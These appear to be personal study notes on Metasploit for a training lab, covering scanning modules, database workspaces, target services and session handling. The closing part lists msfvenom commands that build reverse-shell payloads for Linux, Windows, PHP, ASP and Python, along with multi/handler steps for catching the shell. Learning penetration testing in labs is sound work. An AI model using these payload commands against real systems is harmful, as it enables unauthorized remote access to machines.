Scanning: -‘search portscan’: displays the available scanning modules (ack, ftpbouce, syn, tcp etc) -‘show options’: list options avaiable (concurrency, ports, rhosts, threads) -possible to directly perform nmap scans from the msfconsole
UDP service identification scanner/discovery/udp_sweep: module allows for quick identification of services running over UDP(user datagram protocol) -quick way to ID: DNS or NetBIOS
SMB Scans -‘smb_enumshares’ -‘smb_verson’us
Metasploit Database -database functionality to simplify project management and and avoid possible confusion when setting up parameter values
- start postgresql - ‘systemctl start postgresql’
- initalize the metasploit database - ‘msfdb init’
- launch msfconsole - ‘msfconsole’
- check status - ‘db_status’
add a workspace ‘-a’ followed by name of workspace delete a wordspace ‘-d’ followed by name of workspace
database name is printed in red, starting with * symbol ‘workspace’ followed by name of workspace to navigate between workspaces ‘-h’: list available options for ‘workspace’ command
nmap scan using ‘db_nmap’ will save all results to the database access hosts ‘hosts’ access services ‘services’ ‘-h’: list available options for hosts and services
You may want to look for low-hanging fruits such as: HTTP: Could potentially host a web application where you can find vulnerabilities like SQL injection or Remote Code Execution (RCE). FTP: Could allow anonymous login and provide access to interesting files. SMB: Could be vulnerable to SMB exploits like MS17-010 SSH: Could have default or easy to guess credentials RDP: Could be vulnerable to Bluekeep or allow desktop access if weak credentials were used.
‘info’ - list more information on a module ‘show payloads’ - list other commands that can be used with that specific exploit ‘set payload [num]’ - choose payload ctrl+z - background a session ctrl+c - abort a session
‘sessions’ - list all active sessions ‘sessions -i [num]’ - interact with session
Msfvenom - allows generation of payloads -create payloads in PHP, exe, dll, elf, etc targeting apple, windows, android, linux ‘msfvenom —list formats’ - list supported output formats encoders - encode payload ‘-e’ handlers - receive a connection from a target is ‘catching a shell’
- generate PHP shell using MSFvenom
- Start the metasploit handler
- Execute the PHP shell
use exploit/multi/handler - receive incoming connection set payload php/reverse_php set lhost [local host IP] set lport [local port] run - await incoming connection
Linux Executable and Linkable format (elf) msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f elf > rev_shell.elf
windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f exe > rev_shell.exe
PHP msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.php
ASP msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f asp > rev_shell.asp
Python msfvenom -p cmd/unix/reverse_python LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.py